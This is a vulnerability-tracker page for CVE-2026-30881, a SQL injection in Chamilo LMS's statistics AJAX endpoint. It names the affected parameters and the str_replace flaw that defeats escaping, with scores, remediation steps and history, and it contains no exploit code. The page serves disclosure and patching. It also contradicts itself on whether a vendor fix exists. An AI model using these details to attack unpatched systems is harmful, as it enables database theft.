Description
Chamilo LMS is a learning management system. Version 1.11.34 and prior contains a SQL Injection vulnerability in the statistics AJAX endpoint. The parameters date_start and date_end from $_REQUEST are embedded directly into a raw SQL string without proper sanitization. Although Database::escape_string() is called downstream, its output is immediately neutralized by str_replace("\'", "'", ...), which restores any injected single quotes — effectively bypassing the escaping mechanism entirely. This allows an authenticated attacker to inject arbitrary SQL statements into the database query, enabling blind time-based and conditional data extraction. This issue has been patched in version 1.11.36.
Published: 2026-03-16
Score: 8.8 High
EPSS: < 1% Very Low
KEV: No
Impact: Database Data Exfiltration via SQL Injection
Action: Immediate Patch
AI Analysis

Impact

Chamilo LMS versions 1.11.34 and earlier contain a SQL Injection vulnerability in the statistics AJAX endpoint. The parameters date_start and date_end are incorporated directly into a raw SQL string. Although Database::escape_string() is invoked, its output is later neutralized by a str_replace that restores injected single quotes, effectively bypassing the escaping mechanism. This flaw enables an authenticated attacker to inject arbitrary SQL statements, resulting in blind time‑based or conditional data extraction, thus compromising database confidentiality.

Affected Systems

Affected only Chamilo LMS (chamilo:chamilo-lms) running versions 1.11.34 and older. The fix has been released in 1.11.36.

Risk and Exploitability

The CVSS base score is 8.8, indicating high severity, while the EPSS score is below 1 %, suggesting a low likelihood of exploitation currently. It is not listed in the CISA KEV catalog. The vulnerability is exploitable via the web interface’s AJAX endpoint and requires authentication, implying the attack vector is remote but authenticated. No official workaround is available; patching is the only effective remedy.

Generated by OpenCVE AI on March 17, 2026 at 20:38 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the vendor patch to upgrade Chamilo LMS to version 1.11.36 or later
  • If immediate patching is not possible, restrict access to the statistics AJAX endpoint to trusted IP ranges or disable the endpoint temporarily
  • Verify that no SQL injection is possible by testing the endpoint with values containing single quotes after patching
  • Monitor logs for evidence of exploitation, such as unexpected query patterns or repeated failed login attempts

Generated by OpenCVE AI on March 17, 2026 at 20:38 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 17 Mar 2026 19:00:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:*

Tue, 17 Mar 2026 10:00:00 +0000

Type Values Removed Values Added
First Time appeared Chamilo
Chamilo chamilo Lms
Vendors & Products Chamilo
Chamilo chamilo Lms

Mon, 16 Mar 2026 21:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Mon, 16 Mar 2026 19:30:00 +0000

Type Values Removed Values Added
Description Chamilo LMS is a learning management system. Version 1.11.34 and prior contains a SQL Injection vulnerability in the statistics AJAX endpoint. The parameters date_start and date_end from $_REQUEST are embedded directly into a raw SQL string without proper sanitization. Although Database::escape_string() is called downstream, its output is immediately neutralized by str_replace("\'", "'", ...), which restores any injected single quotes — effectively bypassing the escaping mechanism entirely. This allows an authenticated attacker to inject arbitrary SQL statements into the database query, enabling blind time-based and conditional data extraction. This issue has been patched in version 1.11.36.
Title Chamilo LMS: SQL Injection in the statistics AJAX endpoint
Weaknesses CWE-89
References
Metrics cvssV3_1

{'score': 8.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}

Subscriptions

Chamilo Chamilo Lms
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-16T20:22:42.641Z

Reserved: 2026-03-06T00:04:56.699Z

Link: CVE-2026-30881

cve-icon Vulnrichment

Updated: 2026-03-16T20:20:28.457Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-16T20:16:18.640

Modified: 2026-03-17T18:52:41.947

Link: CVE-2026-30881

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-03-24T10:49:51Z

Weaknesses